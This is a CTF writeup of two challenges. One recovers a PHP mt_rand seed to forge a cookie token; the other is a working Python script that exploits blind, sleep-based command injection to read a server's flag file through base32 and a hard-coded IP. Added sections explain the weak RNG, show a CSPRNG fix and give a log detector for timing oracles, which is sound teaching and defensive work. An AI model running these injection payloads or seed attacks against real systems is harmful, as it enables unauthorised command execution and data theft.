First "Diaoyucheng Cup" (钓鱼城杯) CTF writeup

easyseed

Visiting the site, a lock value shows up in the cookie. A directory scan turns up index.bak:

$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');

// Both values are built from mt_rand(), so they are fully determined by the seed.
function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

So the plan is to brute-force the mt_rand seed. First, convert the lock into the input format that php_mt_seed 4.0 accepts (one group of four numbers per output: the observed value twice, then the range bounds 0 and 51):

# coding: utf-8

str1 = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'  # charset used by random() in index.bak
str2 = 'vEUHaY'                                                # the lock value taken from the cookie
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            # php_mt_seed wants "value value range_min range_max" for each mt_rand() output
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)

php_mt_seed reports two candidate seeds. Because PHP 7.1 changed mt_rand's output, the seed has to be replayed on a pre-7.1 interpreter, so switch the local PHP to 5.6 and run this script:

function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

// Candidate seeds reported by php_mt_seed; try each until $lock matches the cookie value.
$seed = 718225;
//$seed = 4007230629;
mt_srand($seed);
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1234567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
echo $lock;
echo "<hr>";
echo $key;

After getting the key, submitting it in the cookie was still wrong; after the contest I saw a writeup saying it had to go in the XFF (X-Forwarded-For) header...
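As an added illustration (not part of the original writeup, and not php_mt_seed's code), the Python below reimplements the generator behind mt_rand() to show why both the php_mt_seed input format above and the PHP 5.6 replay work: the only secret in random() is a 32-bit seed, so anyone who sees a few output characters can search the seed space and then regenerate every later value, including $key. It also shows the mitigation, drawing the token from a CSPRNG (secrets here; random_int() or random_bytes() in PHP). Assumptions: CHARS is the challenge's charset copied from index.bak; rand_range reproduces the PHP 5.x scaling of mt_rand($min, $max); php_legacy=True follows the pre-7.1 twist variant (the one PHP now calls MT_RAND_PHP) that made the author drop to PHP 5.6, while the default mode is the standard MT19937; the seed window given to recover_seed is deliberately tiny, where php_mt_seed walks all 2^32 seeds in C.

```python
# Added example, not from the writeup: why a token built from mt_rand() is
# recoverable from its output, and what to use instead.
import secrets

class MT19937:
    """Standard MT19937, the generator behind PHP's mt_rand()."""
    N, M = 624, 397
    MATRIX_A, UPPER, LOWER = 0x9908B0DF, 0x80000000, 0x7FFFFFFF

    def __init__(self, seed, php_legacy=False):
        self.php_legacy = php_legacy
        self.mt = [0] * self.N
        self.mt[0] = seed & 0xFFFFFFFF
        for i in range(1, self.N):          # same recurrence as PHP's php_mt_initialize()
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = self.N                 # first output twists, like PHP's reload after mt_srand()

    def _twist(self):
        mt, N, M = self.mt, self.N, self.M
        for i in range(N):
            u, v = mt[i], mt[(i + 1) % N]
            y = (u & self.UPPER) | (v & self.LOWER)
            # PHP before 7.1 tested the low bit of u instead of v here (assumption:
            # reproduced from the pre-7.1 ext/standard/rand.c twist macro).
            low = (u & 1) if self.php_legacy else (v & 1)
            mt[i] = mt[(i + M) % N] ^ (y >> 1) ^ (self.MATRIX_A if low else 0)
        self.index = 0

    def next_u32(self):
        if self.index >= self.N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11                        # tempering, identical in PHP
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF

    def rand_range(self, lo, hi):
        """mt_rand($min, $max) as PHP 5.x computed it: drop one bit, then scale
        the 31-bit value into the range. PHP 7.1+ uses rejection sampling instead."""
        n = self.next_u32() >> 1
        return lo + int((hi - lo + 1.0) * (n / (0x7FFFFFFF + 1.0)))


def mt_outputs(seed, n, php_legacy=False):
    """First n raw 32-bit outputs for a seed (handy for comparing generator modes)."""
    rng = MT19937(seed, php_legacy)
    return [rng.next_u32() for _ in range(n)]


CHARS = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'  # charset from index.bak

def weak_token(seed, length, chars=CHARS, php_legacy=False):
    """The challenge's random() helper: every character is a function of the seed."""
    rng = MT19937(seed, php_legacy)
    return ''.join(chars[rng.rand_range(0, len(chars) - 1)] for _ in range(length))

def recover_seed(token, seed_lo, seed_hi, chars=CHARS, php_legacy=False):
    """Search a small, explicitly bounded seed window for one that reproduces
    `token`. This is the principle behind php_mt_seed, which covers all 2**32
    seeds in optimized C; the window here is kept tiny on purpose."""
    for seed in range(seed_lo, seed_hi):
        if weak_token(seed, len(token), chars, php_legacy) == token:
            return seed
    return None

def strong_token(length, chars=CHARS):
    """Mitigation: an OS-backed CSPRNG has no recoverable seed."""
    return ''.join(secrets.choice(chars) for _ in range(length))


if __name__ == '__main__':
    tok = weak_token(1500, 6)
    print('weak token', tok, 'came from seed', recover_seed(tok, 1000, 2000))
    print('strong token', strong_token(16))
```

Two things follow from the code: the range columns in the php_mt_seed format are exactly the lo/hi arguments of rand_range, which is why the conversion script emits "0 51" for a 52-character charset; and switching generator modes changes every output, which is why a seed found for one PHP version does not replay on another.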

easyweb

The site shows the Apache default page, and a directory scan finds nothing. The response header contains Post:cmd, but running commands through it returns no output; cmd=sleep 2 does produce a delay, so this is blind command execution and the result can be read out with a script:

# coding: utf-8
import requests

# Candidate characters tried at each position (the flag is read through base32)
payloads = "QWERTYUIIOPASDFGHJKLZXCVBNM1234567890="

def post_request(url, data, timeout=2):
    # A timeout means the injected "sleep 2" ran, i.e. the guessed character is right.
    try:
        requests.post(url, data=data, timeout=timeout)
    except Exception as e:
        #print(e)
        return True
    return False


def get_content(url, length, timeout=2):
    content = ''
    for i in range(1, int(length) + 1):
        print('[+]length: ', i)
        for payload in payloads:
            data = {
                'cmd': 'if [ $(cat /f*|base32|cut -c {}) = {} ];then sleep 2;fi'.format(i, payload)
            }
            #print(data)
            if post_request(url, data, timeout):
                content += payload
                print(content)
                break
    return content


if __name__ == '__main__':
    url = 'http://119.3.37.185/index.php'
    get_content(url, 50)
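From the defender's side, the extraction above leaves a distinctive trace: one client sends dozens of POSTs to one path, and a small fraction of them take almost exactly the injected sleep time while the rest return immediately. The following is an added example (not part of the writeup) of a log-side check for that pattern. It assumes Apache's combined log format with the %D directive (response time in microseconds) appended, and the log lines are constructed for the example; the thresholds in find_timing_oracles are starting points, not tuned values.

```python
# Added example, not from the writeup: flag the timing pattern that a
# blind, sleep-based command injection leaves in an access log.
import re
from collections import defaultdict

# Combined log format with "%D" (microseconds) appended; assumption for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<micros>\d+)$'
)

# Constructed sample: 10.0.0.9 is a normal visitor, 10.0.0.5 probes one character
# at a time and hits three matches, each costing the injected 2-second sleep.
SAMPLE_LOG = """\
10.0.0.9 - - [10/Oct/2021:12:00:01 +0800] "GET / HTTP/1.1" 200 3000 "-" "Mozilla/5.0" 1450
10.0.0.5 - - [10/Oct/2021:12:00:02 +0800] "POST /index.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1" 2103
10.0.0.5 - - [10/Oct/2021:12:00:02 +0800] "POST /index.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1" 1987
10.0.0.5 - - [10/Oct/2021:12:00:04 +0800] "POST /index.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1" 2004911
10.0.0.5 - - [10/Oct/2021:12:00:05 +0800] "POST /index.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1" 2210
10.0.0.5 - - [10/Oct/2021:12:00:05 +0800] "POST /index.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1" 1890
10.0.0.5 - - [10/Oct/2021:12:00:07 +0800] "POST /index.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1" 2003280
10.0.0.5 - - [10/Oct/2021:12:00:08 +0800] "POST /index.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1" 2330
10.0.0.5 - - [10/Oct/2021:12:00:10 +0800] "POST /index.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1" 2001102
10.0.0.9 - - [10/Oct/2021:12:00:11 +0800] "POST /index.php HTTP/1.1" 200 120 "-" "Mozilla/5.0" 2210
"""

def parse_log(text):
    """Yield one dict per line that matches LOG_RE; unparseable lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            entry['seconds'] = int(entry['micros']) / 1e6
            yield entry

def find_timing_oracles(entries, delay=2.0, tolerance=0.3, min_posts=6, min_slow=2):
    """Group POSTs by (client, path) and flag groups in which at least `min_slow`
    responses cluster around `delay` seconds while others return fast.
    A genuinely slow endpoint is slow for every client and not pinned to one
    value; the injection pattern is client-specific, bimodal and pinned to
    the sleep the attacker chose."""
    groups = defaultdict(list)
    for e in entries:
        if e['method'] == 'POST':
            groups[(e['ip'], e['path'])].append(e['seconds'])
    findings = []
    for (ip, path), times in groups.items():
        slow = [t for t in times if abs(t - delay) <= tolerance]
        fast = [t for t in times if t < 0.5]
        if len(times) >= min_posts and len(slow) >= min_slow and fast:
            findings.append({'ip': ip, 'path': path, 'posts': len(times), 'slow': len(slow)})
    return findings

if __name__ == '__main__':
    for finding in find_timing_oracles(parse_log(SAMPLE_LOG)):
        print(finding)
```

Run against the constructed lines it reports only 10.0.0.5 on /index.php (8 POSTs, 3 of them at about 2 s). The check is cheap enough to run over rotated logs; in practice the delay to look for is whatever value the attacker picked, so scanning a few common sleep lengths, or looking for any tight latency cluster well above the endpoint's norm, is more robust than hard-coding 2.0.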